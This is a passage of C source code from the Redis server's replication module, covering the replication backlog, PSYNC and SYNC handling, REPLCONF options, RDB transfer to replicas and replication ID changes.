limit. */ while(len) { size_t thislen = server.repl_backlog_size - server.repl_backlog_idx; if (thislen > len) thislen = len; memcpy(server.repl_backlog+server.repl_backlog_idx,p,thislen); server.repl_backlog_idx += thislen; if (server.repl_backlog_idx == server.repl_backlog_size) server.repl_backlog_idx = 0; len -= thislen; p += thislen; server.repl_backlog_histlen += thislen; } if (server.repl_backlog_histlen > server.repl_backlog_size) server.repl_backlog_histlen = server.repl_backlog_size; /* Set the offset of the first byte we have in the backlog. */ server.repl_backlog_off = server.master_repl_offset - server.repl_backlog_histlen + 1; } /* Wrapper for feedReplicationBacklog() that takes Redis string objects * as input. */ void feedReplicationBacklogWithObject(robj *o) { char llstr[LONG_STR_SIZE]; void *p; size_t len; if (o->encoding == OBJ_ENCODING_INT) { len = ll2string(llstr,sizeof(llstr),(long)o->ptr); p = llstr; } else { len = sdslen(o->ptr); p = o->ptr; } feedReplicationBacklog(p,len); } /* Propagate write commands to slaves, and populate the replication backlog * as well. This function is used if the instance is a master: we use * the commands received by our clients in order to create the replication * stream. Instead if the instance is a slave and has sub-slaves attached, * we use replicationFeedSlavesFromMaster() */ void replicationFeedSlaves(list *slaves, int dictid, robj **argv, int argc) { listNode *ln; listIter li; int j, len; char llstr[LONG_STR_SIZE]; /* If the instance is not a top level master, return ASAP: we'll just proxy * the stream of data we receive from our master instead, in order to * propagate *identical* replication stream. In this way this slave can * advertise the same replication ID as the master (since it shares the * master replication history and has the same backlog and offsets). */ if (server.masterhost != NULL) return; /* If there aren't slaves, and there is no backlog buffer to populate, * we can return ASAP. */ if (server.repl_backlog == NULL && listLength(slaves) == 0) return; /* We can't have slaves attached and no backlog. */ serverAssert(!(listLength(slaves) != 0 && server.repl_backlog == NULL)); /* Send SELECT command to every slave if needed. */ if (server.slaveseldb != dictid) { robj *selectcmd; /* For a few DBs we have pre-computed SELECT command. */ if (dictid >= 0 && dictid < PROTO_SHARED_SELECT_CMDS) { selectcmd = shared.select[dictid]; } else { int dictid_len; dictid_len = ll2string(llstr,sizeof(llstr),dictid); selectcmd = createObject(OBJ_STRING, sdscatprintf(sdsempty(), "*2\r\n$6\r\nSELECT\r\n$%d\r\n%s\r\n", dictid_len, llstr)); } /* Add the SELECT command into the backlog. */ if (server.repl_backlog) feedReplicationBacklogWithObject(selectcmd); /* Send it to slaves. */ listRewind(slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) continue; addReply(slave,selectcmd); } if (dictid < 0 || dictid >= PROTO_SHARED_SELECT_CMDS) decrRefCount(selectcmd); } server.slaveseldb = dictid; /* Write the command to the replication backlog if any. */ if (server.repl_backlog) { char aux[LONG_STR_SIZE+3]; /* Add the multi bulk reply length. */ aux[0] = '*'; len = ll2string(aux+1,sizeof(aux)-1,argc); aux[len+1] = '\r'; aux[len+2] = '\n'; feedReplicationBacklog(aux,len+3); for (j = 0; j < argc; j++) { long objlen = stringObjectLen(argv[j]); /* We need to feed the buffer with the object as a bulk reply * not just as a plain string, so create the $..CRLF payload len * and add the final CRLF */ aux[0] = '$'; len = ll2string(aux+1,sizeof(aux)-1,objlen); aux[len+1] = '\r'; aux[len+2] = '\n'; feedReplicationBacklog(aux,len+3); feedReplicationBacklogWithObject(argv[j]); feedReplicationBacklog(aux+len+1,2); } } /* Write the command to every slave. */ listRewind(slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; /* Don't feed slaves that are still waiting for BGSAVE to start */ if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) continue; /* Feed slaves that are waiting for the initial SYNC (so these commands * are queued in the output buffer until the initial SYNC completes), * or are already in sync with the master. */ /* Add the multi bulk length. */ addReplyMultiBulkLen(slave,argc); /* Finally any additional argument that was not stored inside the * static buffer if any (from j to argc). */ for (j = 0; j < argc; j++) addReplyBulk(slave,argv[j]); } } /* This function is used in order to proxy what we receive from our master * to our sub-slaves. */ #include <ctype.h> void replicationFeedSlavesFromMasterStream(list *slaves, char *buf, size_t buflen) { listNode *ln; listIter li; /* Debugging: this is handy to see the stream sent from master * to slaves. Disabled with if(0). */ if (0) { printf("%zu:",buflen); for (size_t j = 0; j < buflen; j++) { printf("%c", isprint(buf[j]) ? buf[j] : '.'); } printf("\n"); } if (server.repl_backlog) feedReplicationBacklog(buf,buflen); listRewind(slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; /* Don't feed slaves that are still waiting for BGSAVE to start */ if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) continue; addReplyString(slave,buf,buflen); } } void replicationFeedMonitors(client *c, list *monitors, int dictid, robj **argv, int argc) { listNode *ln; listIter li; int j; sds cmdrepr = sdsnew("+"); robj *cmdobj; struct timeval tv; gettimeofday(&tv,NULL); cmdrepr = sdscatprintf(cmdrepr,"%ld.%06ld ",(long)tv.tv_sec,(long)tv.tv_usec); if (c->flags & CLIENT_LUA) { cmdrepr = sdscatprintf(cmdrepr,"[%d lua] ",dictid); } else if (c->flags & CLIENT_UNIX_SOCKET) { cmdrepr = sdscatprintf(cmdrepr,"[%d unix:%s] ",dictid,server.unixsocket); } else { cmdrepr = sdscatprintf(cmdrepr,"[%d %s] ",dictid,getClientPeerId(c)); } for (j = 0; j < argc; j++) { if (argv[j]->encoding == OBJ_ENCODING_INT) { cmdrepr = sdscatprintf(cmdrepr, "\"%ld\"", (long)argv[j]->ptr); } else { cmdrepr = sdscatrepr(cmdrepr,(char*)argv[j]->ptr, sdslen(argv[j]->ptr)); } if (j != argc-1) cmdrepr = sdscatlen(cmdrepr," ",1); } cmdrepr = sdscatlen(cmdrepr,"\r\n",2); cmdobj = createObject(OBJ_STRING,cmdrepr); listRewind(monitors,&li); while((ln = listNext(&li))) { client *monitor = ln->value; addReply(monitor,cmdobj); } decrRefCount(cmdobj); } /* Feed the slave 'c' with the replication backlog starting from the * specified 'offset' up to the end of the backlog. */ long long addReplyReplicationBacklog(client *c, long long offset) { long long j, skip, len; serverLog(LL_DEBUG, "[PSYNC] Slave request offset: %lld", offset); if (server.repl_backlog_histlen == 0) { serverLog(LL_DEBUG, "[PSYNC] Backlog history len is zero"); return 0; } serverLog(LL_DEBUG, "[PSYNC] Backlog size: %lld", server.repl_backlog_size); serverLog(LL_DEBUG, "[PSYNC] First byte: %lld", server.repl_backlog_off); serverLog(LL_DEBUG, "[PSYNC] History len: %lld", server.repl_backlog_histlen); serverLog(LL_DEBUG, "[PSYNC] Current index: %lld", server.repl_backlog_idx); /* Compute the amount of bytes we need to discard. */ skip = offset - server.repl_backlog_off; serverLog(LL_DEBUG, "[PSYNC] Skipping: %lld", skip); /* Point j to the oldest byte, that is actually our * server.repl_backlog_off byte. */ j = (server.repl_backlog_idx + (server.repl_backlog_size-server.repl_backlog_histlen)) % server.repl_backlog_size; serverLog(LL_DEBUG, "[PSYNC] Index of first byte: %lld", j); /* Discard the amount of data to seek to the specified 'offset'. */ j = (j + skip) % server.repl_backlog_size; /* Feed slave with data. Since it is a circular buffer we have to * split the reply in two parts if we are cross-boundary. */ len = server.repl_backlog_histlen - skip; serverLog(LL_DEBUG, "[PSYNC] Reply total length: %lld", len); while(len) { long long thislen = ((server.repl_backlog_size - j) < len) ? (server.repl_backlog_size - j) : len; serverLog(LL_DEBUG, "[PSYNC] addReply() length: %lld", thislen); addReplySds(c,sdsnewlen(server.repl_backlog + j, thislen)); len -= thislen; j = 0; } return server.repl_backlog_histlen - skip; } /* Return the offset to provide as reply to the PSYNC command received * from the slave. The returned value is only valid immediately after * the BGSAVE process started and before executing any other command * from clients. */ long long getPsyncInitialOffset(void) { return server.master_repl_offset; } /* Send a FULLRESYNC reply in the specific case of a full resynchronization, * as a side effect setup the slave for a full sync in different ways: * * 1) Remember, into the slave client structure, the replication offset * we sent here, so that if new slaves will later attach to the same * background RDB saving process (by duplicating this client output * buffer), we can get the right offset from this slave. * 2) Set the replication state of the slave to WAIT_BGSAVE_END so that * we start accumulating differences from this point. * 3) Force the replication stream to re-emit a SELECT statement so * the new slave incremental differences will start selecting the * right database number. * * Normally this function should be called immediately after a successful * BGSAVE for replication was started, or when there is one already in * progress that we attached our slave to. */ int replicationSetupSlaveForFullResync(client *slave, long long offset) { char buf[128]; int buflen; slave->psync_initial_offset = offset; slave->replstate = SLAVE_STATE_WAIT_BGSAVE_END; /* We are going to accumulate the incremental changes for this * slave as well. Set slaveseldb to -1 in order to force to re-emit * a SELECT statement in the replication stream. */ server.slaveseldb = -1; /* Don't send this reply to slaves that approached us with * the old SYNC command. */ if (!(slave->flags & CLIENT_PRE_PSYNC)) { buflen = snprintf(buf,sizeof(buf),"+FULLRESYNC %s %lld\r\n", server.replid,offset); if (write(slave->fd,buf,buflen) != buflen) { freeClientAsync(slave); return C_ERR; } } return C_OK; } /* This function handles the PSYNC command from the point of view of a * master receiving a request for partial resynchronization. * * On success return C_OK, otherwise C_ERR is returned and we proceed * with the usual full resync. */ int masterTryPartialResynchronization(client *c) { long long psync_offset, psync_len; char *master_replid = c->argv[1]->ptr; char buf[128]; int buflen; /* Parse the replication offset asked by the slave. Go to full sync * on parse error: this should never happen but we try to handle * it in a robust way compared to aborting. */ if (getLongLongFromObjectOrReply(c,c->argv[2],&psync_offset,NULL) != C_OK) goto need_full_resync; /* Is the replication ID of this master the same advertised by the wannabe * slave via PSYNC? If the replication ID changed this master has a * different replication history, and there is no way to continue. * * Note that there are two potentially valid replication IDs: the ID1 * and the ID2. The ID2 however is only valid up to a specific offset. */ if (strcasecmp(master_replid, server.replid) && (strcasecmp(master_replid, server.replid2) || psync_offset > server.second_replid_offset)) { /* Run id "?" is used by slaves that want to force a full resync. */ if (master_replid[0] != '?') { if (strcasecmp(master_replid, server.replid) && strcasecmp(master_replid, server.replid2)) { serverLog(LL_NOTICE,"Partial resynchronization not accepted: " "Replication ID mismatch (Slave asked for '%s', my " "replication IDs are '%s' and '%s')", master_replid, server.replid, server.replid2); } else { serverLog(LL_NOTICE,"Partial resynchronization not accepted: " "Requested offset for second ID was %lld, but I can reply " "up to %lld", psync_offset, server.second_replid_offset); } } else { serverLog(LL_NOTICE,"Full resync requested by slave %s", replicationGetSlaveName(c)); } goto need_full_resync; } /* We still have the data our slave is asking for? */ if (!server.repl_backlog || psync_offset < server.repl_backlog_off || psync_offset > (server.repl_backlog_off + server.repl_backlog_histlen)) { serverLog(LL_NOTICE, "Unable to partial resync with slave %s for lack of backlog (Slave request was: %lld).", replicationGetSlaveName(c), psync_offset); if (psync_offset > server.master_repl_offset) { serverLog(LL_WARNING, "Warning: slave %s tried to PSYNC with an offset that is greater than the master replication offset.", replicationGetSlaveName(c)); } goto need_full_resync; } /* If we reached this point, we are able to perform a partial resync: * 1) Set client state to make it a slave. * 2) Inform the client we can continue with +CONTINUE * 3) Send the backlog data (from the offset to the end) to the slave. */ c->flags |= CLIENT_SLAVE; c->replstate = SLAVE_STATE_ONLINE; c->repl_ack_time = server.unixtime; c->repl_put_online_on_ack = 0; listAddNodeTail(server.slaves,c); /* We can't use the connection buffers since they are used to accumulate * new commands at this stage. But we are sure the socket send buffer is * empty so this write will never fail actually. */ if (c->slave_capa & SLAVE_CAPA_PSYNC2) { buflen = snprintf(buf,sizeof(buf),"+CONTINUE %s\r\n", server.replid); } else { buflen = snprintf(buf,sizeof(buf),"+CONTINUE\r\n"); } if (write(c->fd,buf,buflen) != buflen) { freeClientAsync(c); return C_OK; } psync_len = addReplyReplicationBacklog(c,psync_offset); serverLog(LL_NOTICE, "Partial resynchronization request from %s accepted. Sending %lld bytes of backlog starting from offset %lld.", replicationGetSlaveName(c), psync_len, psync_offset); /* Note that we don't need to set the selected DB at server.slaveseldb * to -1 to force the master to emit SELECT, since the slave already * has this state from the previous connection with the master. */ refreshGoodSlavesCount(); return C_OK; /* The caller can return, no full resync needed. */ need_full_resync: /* We need a full resync for some reason... Note that we can't * reply to PSYNC right now if a full SYNC is needed. The reply * must include the master offset at the time the RDB file we transfer * is generated, so we need to delay the reply to that moment. */ return C_ERR; } /* Start a BGSAVE for replication goals, which is, selecting the disk or * socket target depending on the configuration, and making sure that * the script cache is flushed before to start. * * The mincapa argument is the bitwise AND among all the slaves capabilities * of the slaves waiting for this BGSAVE, so represents the slave capabilities * all the slaves support. Can be tested via SLAVE_CAPA_* macros. * * Side effects, other than starting a BGSAVE: * * 1) Handle the slaves in WAIT_START state, by preparing them for a full * sync if the BGSAVE was succesfully started, or sending them an error * and dropping them from the list of slaves. * * 2) Flush the Lua scripting script cache if the BGSAVE was actually * started. * * Returns C_OK on success or C_ERR otherwise. */ int startBgsaveForReplication(int mincapa) { int retval; int socket_target = server.repl_diskless_sync && (mincapa & SLAVE_CAPA_EOF); listIter li; listNode *ln; serverLog(LL_NOTICE,"Starting BGSAVE for SYNC with target: %s", socket_target ? "slaves sockets" : "disk"); rdbSaveInfo rsi, *rsiptr; rsiptr = rdbPopulateSaveInfo(&rsi); /* Only do rdbSave* when rsiptr is not NULL, * otherwise slave will miss repl-stream-db. */ if (rsiptr) { if (socket_target) retval = rdbSaveToSlavesSockets(rsiptr); else retval = rdbSaveBackground(server.rdb_filename,rsiptr); } else { serverLog(LL_WARNING,"BGSAVE for replication: replication information not available, can't generate the RDB file right now. Try later."); retval = C_ERR; } /* If we failed to BGSAVE, remove the slaves waiting for a full * resynchorinization from the list of salves, inform them with * an error about what happened, close the connection ASAP. */ if (retval == C_ERR) { serverLog(LL_WARNING,"BGSAVE for replication failed"); listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) { slave->flags &= ~CLIENT_SLAVE; listDelNode(server.slaves,ln); addReplyError(slave, "BGSAVE failed, replication can't continue"); slave->flags |= CLIENT_CLOSE_AFTER_REPLY; } } return retval; } /* If the target is socket, rdbSaveToSlavesSockets() already setup * the salves for a full resync. Otherwise for disk target do it now.*/ if (!socket_target) { listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) { replicationSetupSlaveForFullResync(slave, getPsyncInitialOffset()); } } } /* Flush the script cache, since we need that slave differences are * accumulated without requiring slaves to match our cached scripts. */ if (retval == C_OK) replicationScriptCacheFlush(); return retval; } /* SYNC and PSYNC command implemenation. */ void syncCommand(client *c) { /* ignore SYNC if already slave or in monitor mode */ if (c->flags & CLIENT_SLAVE) return; /* Refuse SYNC requests if we are a slave but the link with our master * is not ok... */ if (server.masterhost && server.repl_state != REPL_STATE_CONNECTED) { addReplySds(c,sdsnew("-NOMASTERLINK Can't SYNC while not connected with my master\r\n")); return; } /* SYNC can't be issued when the server has pending data to send to * the client about already issued commands. We need a fresh reply * buffer registering the differences between the BGSAVE and the current * dataset, so that we can copy to other slaves if needed. */ if (clientHasPendingReplies(c)) { addReplyError(c,"SYNC and PSYNC are invalid with pending output"); return; } serverLog(LL_NOTICE,"Slave %s asks for synchronization", replicationGetSlaveName(c)); /* Try a partial resynchronization if this is a PSYNC command. * If it fails, we continue with usual full resynchronization, however * when this happens masterTryPartialResynchronization() already * replied with: * * +FULLRESYNC <replid> <offset> * * So the slave knows the new replid and offset to try a PSYNC later * if the connection with the master is lost. */ if (!strcasecmp(c->argv[0]->ptr,"psync")) { if (masterTryPartialResynchronization(c) == C_OK) { server.stat_sync_partial_ok++; return; /* No full resync needed, return. */ } else { char *master_replid = c->argv[1]->ptr; /* Increment stats for failed PSYNCs, but only if the * replid is not "?", as this is used by slaves to force a full * resync on purpose when they are not albe to partially * resync. */ if (master_replid[0] != '?') server.stat_sync_partial_err++; } } else { /* If a slave uses SYNC, we are dealing with an old implementation * of the replication protocol (like redis-cli --slave). Flag the client * so that we don't expect to receive REPLCONF ACK feedbacks. */ c->flags |= CLIENT_PRE_PSYNC; } /* Full resynchronization. */ server.stat_sync_full++; /* Setup the slave as one waiting for BGSAVE to start. The following code * paths will change the state if we handle the slave differently. */ c->replstate = SLAVE_STATE_WAIT_BGSAVE_START; if (server.repl_disable_tcp_nodelay) anetDisableTcpNoDelay(NULL, c->fd); /* Non critical if it fails. */ c->repldbfd = -1; c->flags |= CLIENT_SLAVE; listAddNodeTail(server.slaves,c); /* Create the replication backlog if needed. */ if (listLength(server.slaves) == 1 && server.repl_backlog == NULL) { /* When we create the backlog from scratch, we always use a new * replication ID and clear the ID2, since there is no valid * past history. */ changeReplicationId(); clearReplicationId2(); createReplicationBacklog(); } /* CASE 1: BGSAVE is in progress, with disk target. */ if (server.rdb_child_pid != -1 && server.rdb_child_type == RDB_CHILD_TYPE_DISK) { /* Ok a background save is in progress. Let's check if it is a good * one for replication, i.e. if there is another slave that is * registering differences since the server forked to save. */ client *slave; listNode *ln; listIter li; listRewind(server.slaves,&li); while((ln = listNext(&li))) { slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_END) break; } /* To attach this slave, we check that it has at least all the * capabilities of the slave that triggered the current BGSAVE. */ if (ln && ((c->slave_capa & slave->slave_capa) == slave->slave_capa)) { /* Perfect, the server is already registering differences for * another slave. Set the right state, and copy the buffer. */ copyClientOutputBuffer(c,slave); replicationSetupSlaveForFullResync(c,slave->psync_initial_offset); serverLog(LL_NOTICE,"Waiting for end of BGSAVE for SYNC"); } else { /* No way, we need to wait for the next BGSAVE in order to * register differences. */ serverLog(LL_NOTICE,"Can't attach the slave to the current BGSAVE. Waiting for next BGSAVE for SYNC"); } /* CASE 2: BGSAVE is in progress, with socket target. */ } else if (server.rdb_child_pid != -1 && server.rdb_child_type == RDB_CHILD_TYPE_SOCKET) { /* There is an RDB child process but it is writing directly to * children sockets. We need to wait for the next BGSAVE * in order to synchronize. */ serverLog(LL_NOTICE,"Current BGSAVE has socket target. Waiting for next BGSAVE for SYNC"); /* CASE 3: There is no BGSAVE is progress. */ } else { if (server.repl_diskless_sync && (c->slave_capa & SLAVE_CAPA_EOF)) { /* Diskless replication RDB child is created inside * replicationCron() since we want to delay its start a * few seconds to wait for more slaves to arrive. */ if (server.repl_diskless_sync_delay) serverLog(LL_NOTICE,"Delay next BGSAVE for diskless SYNC"); } else { /* Target is disk (or the slave is not capable of supporting * diskless replication) and we don't have a BGSAVE in progress, * let's start one. */ if (server.aof_child_pid == -1) { startBgsaveForReplication(c->slave_capa); } else { serverLog(LL_NOTICE, "No BGSAVE in progress, but an AOF rewrite is active. " "BGSAVE for replication delayed"); } } } return; } /* REPLCONF <option> <value> <option> <value> ... * This command is used by a slave in order to configure the replication * process before starting it with the SYNC command. * * Currently the only use of this command is to communicate to the master * what is the listening port of the Slave redis instance, so that the * master can accurately list slaves and their listening ports in * the INFO output. * * In the future the same command can be used in order to configure * the replication to initiate an incremental replication instead of a * full resync. */ void replconfCommand(client *c) { int j; if ((c->argc % 2) == 0) { /* Number of arguments must be odd to make sure that every * option has a corresponding value. */ addReply(c,shared.syntaxerr); return; } /* Process every option-value pair. */ for (j = 1; j < c->argc; j+=2) { if (!strcasecmp(c->argv[j]->ptr,"listening-port")) { long port; if ((getLongFromObjectOrReply(c,c->argv[j+1], &port,NULL) != C_OK)) return; c->slave_listening_port = port; } else if (!strcasecmp(c->argv[j]->ptr,"ip-address")) { sds ip = c->argv[j+1]->ptr; if (sdslen(ip) < sizeof(c->slave_ip)) { memcpy(c->slave_ip,ip,sdslen(ip)+1); } else { addReplyErrorFormat(c,"REPLCONF ip-address provided by " "slave instance is too long: %zd bytes", sdslen(ip)); return; } } else if (!strcasecmp(c->argv[j]->ptr,"capa")) { /* Ignore capabilities not understood by this master. */ if (!strcasecmp(c->argv[j+1]->ptr,"eof")) c->slave_capa |= SLAVE_CAPA_EOF; else if (!strcasecmp(c->argv[j+1]->ptr,"psync2")) c->slave_capa |= SLAVE_CAPA_PSYNC2; } else if (!strcasecmp(c->argv[j]->ptr,"ack")) { /* REPLCONF ACK is used by slave to inform the master the amount * of replication stream that it processed so far. It is an * internal only command that normal clients should never use. */ long long offset; if (!(c->flags & CLIENT_SLAVE)) return; if ((getLongLongFromObject(c->argv[j+1], &offset) != C_OK)) return; if (offset > c->repl_ack_off) c->repl_ack_off = offset; c->repl_ack_time = server.unixtime; /* If this was a diskless replication, we need to really put * the slave online when the first ACK is received (which * confirms slave is online and ready to get more data). */ if (c->repl_put_online_on_ack && c->replstate == SLAVE_STATE_ONLINE) putSlaveOnline(c); /* Note: this command does not reply anything! */ return; } else if (!strcasecmp(c->argv[j]->ptr,"getack")) { /* REPLCONF GETACK is used in order to request an ACK ASAP * to the slave. */ if (server.masterhost && server.master) replicationSendAck(); return; } else { addReplyErrorFormat(c,"Unrecognized REPLCONF option: %s", (char*)c->argv[j]->ptr); return; } } addReply(c,shared.ok); } /* This function puts a slave in the online state, and should be called just * after a slave received the RDB file for the initial synchronization, and * we are finally ready to send the incremental stream of commands. * * It does a few things: * * 1) Put the slave in ONLINE state (useless when the function is called * because state is already ONLINE but repl_put_online_on_ack is true). * 2) Make sure the writable event is re-installed, since calling the SYNC * command disables it, so that we can accumulate output buffer without * sending it to the slave. * 3) Update the count of good slaves. */ void putSlaveOnline(client *slave) { slave->replstate = SLAVE_STATE_ONLINE; slave->repl_put_online_on_ack = 0; slave->repl_ack_time = server.unixtime; /* Prevent false timeout. */ if (aeCreateFileEvent(server.el, slave->fd, AE_WRITABLE, sendReplyToClient, slave) == AE_ERR) { serverLog(LL_WARNING,"Unable to register writable event for slave bulk transfer: %s", strerror(errno)); freeClient(slave); return; } refreshGoodSlavesCount(); serverLog(LL_NOTICE,"Synchronization with slave %s succeeded", replicationGetSlaveName(slave)); } void sendBulkToSlave(aeEventLoop *el, int fd, void *privdata, int mask) { client *slave = privdata; UNUSED(el); UNUSED(mask); char buf[PROTO_IOBUF_LEN]; ssize_t nwritten, buflen; /* Before sending the RDB file, we send the preamble as configured by the * replication process. Currently the preamble is just the bulk count of * the file in the form "$<length>\r\n". */ if (slave->replpreamble) { nwritten = write(fd,slave->replpreamble,sdslen(slave->replpreamble)); if (nwritten == -1) { serverLog(LL_VERBOSE,"Write error sending RDB preamble to slave: %s", strerror(errno)); freeClient(slave); return; } server.stat_net_output_bytes += nwritten; sdsrange(slave->replpreamble,nwritten,-1); if (sdslen(slave->replpreamble) == 0) { sdsfree(slave->replpreamble); slave->replpreamble = NULL; /* fall through sending data. */ } else { return; } } /* If the preamble was already transfered, send the RDB bulk data. */ lseek(slave->repldbfd,slave->repldboff,SEEK_SET); buflen = read(slave->repldbfd,buf,PROTO_IOBUF_LEN); if (buflen <= 0) { serverLog(LL_WARNING,"Read error sending DB to slave: %s", (buflen == 0) ? "premature EOF" : strerror(errno)); freeClient(slave); return; } if ((nwritten = write(fd,buf,buflen)) == -1) { if (errno != EAGAIN) { serverLog(LL_WARNING,"Write error sending DB to slave: %s", strerror(errno)); freeClient(slave); } return; } slave->repldboff += nwritten; server.stat_net_output_bytes += nwritten; if (slave->repldboff == slave->repldbsize) { close(slave->repldbfd); slave->repldbfd = -1; aeDeleteFileEvent(server.el,slave->fd,AE_WRITABLE); putSlaveOnline(slave); } } /* This function is called at the end of every background saving, * or when the replication RDB transfer strategy is modified from * disk to socket or the other way around. * * The goal of this function is to handle slaves waiting for a successful * background saving in order to perform non-blocking synchronization, and * to schedule a new BGSAVE if there are slaves that attached while a * BGSAVE was in progress, but it was not a good one for replication (no * other slave was accumulating differences). * * The argument bgsaveerr is C_OK if the background saving succeeded * otherwise C_ERR is passed to the function. * The 'type' argument is the type of the child that terminated * (if it had a disk or socket target). */ void updateSlavesWaitingBgsave(int bgsaveerr, int type) { listNode *ln; int startbgsave = 0; int mincapa = -1; listIter li; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) { startbgsave = 1; mincapa = (mincapa == -1) ? slave->slave_capa : (mincapa & slave->slave_capa); } else if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_END) { struct redis_stat buf; /* If this was an RDB on disk save, we have to prepare to send * the RDB from disk to the slave socket. Otherwise if this was * already an RDB -> Slaves socket transfer, used in the case of * diskless replication, our work is trivial, we can just put * the slave online. */ if (type == RDB_CHILD_TYPE_SOCKET) { serverLog(LL_NOTICE, "Streamed RDB transfer with slave %s succeeded (socket). Waiting for REPLCONF ACK from slave to enable streaming", replicationGetSlaveName(slave)); /* Note: we wait for a REPLCONF ACK message from slave in * order to really put it online (install the write handler * so that the accumulated data can be transfered). However * we change the replication state ASAP, since our slave * is technically online now. */ slave->replstate = SLAVE_STATE_ONLINE; slave->repl_put_online_on_ack = 1; slave->repl_ack_time = server.unixtime; /* Timeout otherwise. */ } else { if (bgsaveerr != C_OK) { freeClient(slave); serverLog(LL_WARNING,"SYNC failed. BGSAVE child returned an error"); continue; } if ((slave->repldbfd = open(server.rdb_filename,O_RDONLY)) == -1 || redis_fstat(slave->repldbfd,&buf) == -1) { freeClient(slave); serverLog(LL_WARNING,"SYNC failed. Can't open/stat DB after BGSAVE: %s", strerror(errno)); continue; } slave->repldboff = 0; slave->repldbsize = buf.st_size; slave->replstate = SLAVE_STATE_SEND_BULK; slave->replpreamble = sdscatprintf(sdsempty(),"$%lld\r\n", (unsigned long long) slave->repldbsize); aeDeleteFileEvent(server.el,slave->fd,AE_WRITABLE); if (aeCreateFileEvent(server.el, slave->fd, AE_WRITABLE, sendBulkToSlave, slave) == AE_ERR) { freeClient(slave); continue; } } } } if (startbgsave) startBgsaveForReplication(mincapa); } /* Change the current instance replication ID with a new, random one. * This will prevent successful PSYNCs between this master and other * slaves, so the command should be called when something happens that * alters the current story of the dataset. */ void changeReplicationId(void) { getRandomHexChars(server.replid,CONFIG_RUN_ID_SIZE); server.replid[CONFIG_RUN_ID_SIZE] = '\0'; } /* Clear (invalidate) the secondary replication ID. This happens, for * example, after a full resynchronization, when we start a new replication * history. */ void clearReplicationId2(void) { memset(server.replid2,'0',sizeof(server.replid)); server.replid2[CONFIG_RUN_ID_SIZE] = '\0'; server.second_replid_offset = -1; } /* Use the current replication ID / offset as secondary replication * ID, and change the current one in order to start a new history. * This should be used when an instance is switched from slave to master * so that it can serve PSYNC requests performed using the master * replication ID. */ void shiftReplicationId(void) { memcpy(server.replid2,server.replid,sizeof(server.replid)); /* We set the second replid offset to the master offset + 1, since * the slave will ask for the first byte it has not yet received, so * we need to add one to the offset: for example if, as a slave, we are * sure we have the same history as the master for 50 bytes, after we * are turned into a master, we can accept a PSYNC request with offset * 51, since the slave asking has the same history up to the 50th * byte, and is asking for the new bytes starting at offset 51. */ server.second_replid_offset = server.master_repl_offset+1; changeReplicationId(); serverLog(LL_WARNING,"Setting secondary replication ID to %s, valid up to offset: %lld. New replication ID is %s", server.replid2, server.second_replid_offset, server.replid); } /* ----------------------------------- SLAVE -------------------------------- */ /* Returns 1 if the given replication state is a handshake state, * 0 otherwise. */ int slaveIsInHandshakeState(void) { return server.repl_state >= REPL_STATE_RECEIVE_PONG && server.repl_state <= REPL_STATE_RECEIVE_PSYNC; } /* Avoid the master to detect the slave is timing out while loading the * RDB file in initial synchronization. We send a single newline character * that is valid protocol but is guaranteed to either be sent entierly or * not, since the byte is indivisible. * * The function is called in two contexts: while we flush the current * data with emptyDb(), and while we load the new data received as an * RDB file from the master. */ void replicationSendNewlineToMaster(void) { static time_t newline_sent; if (time(NULL) != newline_sent) { newline_sent = time(NULL); if (write(server.repl_transfer_s,"\n",1) == -1) { /* Pinging back in this stage is best-effort. */ } } } /* Callback used by emptyDb() while flushing away old data to load * the new dataset received by the master. */ void replicationEmptyDbCallback(void *privdata) { UNUSED(privdata); replicationSendNewlineToMaster(); } /* Once we have a link with the master and the synchroniziation was * performed, this function materializes the master client we store * at server.master, starting from the specified file descriptor. */ void replicationCreateMasterClient(int fd, int dbid) { server.master = createClient(fd); server.master->flags |= CLIENT_MASTER; server.master->authenticated = 1; server.master->reploff = server.master_initial_offset; server.master->read_reploff = server.master->reploff; memcpy(server.master->replid, server.master_replid, sizeof(server.master_replid)); /* If master offset is set to -1, this master is old and is not * PSYNC capable, so we flag it accordingly. */ if (server.master->reploff == -1) server.master->flags |= CLIENT_PRE_PSYNC; if (dbid != -1) selectDb(server.master,dbid); } void restartAOF() { int retry = 10; while (retry-- && startAppendOnly() == C_ERR) { serverLog(LL_WARNING,"Failed enabling the AOF after successful master synchronization! Trying it again in one second."); sleep(1); } if (!retry) { serverLog(LL_WARNING,"FATAL: this slave instance finished the synchronization with its master, but the AOF can't be turned on. Exiting now."); exit(1); } } /* Asynchronously read the SYNC payload we receive from a master */ #define REPL_MAX_WRITTEN_BEFORE_FSYNC (1024*1024*8) /* 8 MB */ void readSyncBulkPayload(aeEventLoop *el, int fd, void *privdata, int mask) { char buf[4096]; ssize_t nread, readlen; off_t left; UNUSED(el); UNUSED(privdata); UNUSED(mask); /* Static vars used to hold the EOF mark, and the last bytes received * form the server: when they match, we reached the end of the transfer. */ static char eofmark[CONFIG_RUN_ID_SIZE]; static char lastbytes[CONFIG_RUN_ID_SIZE]; static int usemark = 0; /* If repl_transfer_size == -1 we still have to read the bulk length * from the master reply. */ if (server.repl_transfer_size == -1) { if (syncReadLine(fd,buf,1024,server.repl_syncio_timeout*1000) == -1) { serverLog(LL_WARNING, "I/O error reading bulk count from MASTER: %s", strerror(errno)); goto error; } if (buf[0] == '-') { serverLog(LL_WARNING, "MASTER aborted replication with an error: %s", buf+1); goto error; } else if (buf[0] == '\0') { /* At this stage just a newline works as a PING in order to take * the connection live. So we refresh our last interaction * timestamp. */ server.repl_transfer_lastio = server.unixtime; return; } else if (buf[0] != '$') { serverLog(LL_WARNING,"Bad protocol from MASTER, the first byte is not '$' (we received '%s'), are you sure the host and port are right?", buf); goto error; } /* There are two possible forms for the bulk payload. One is 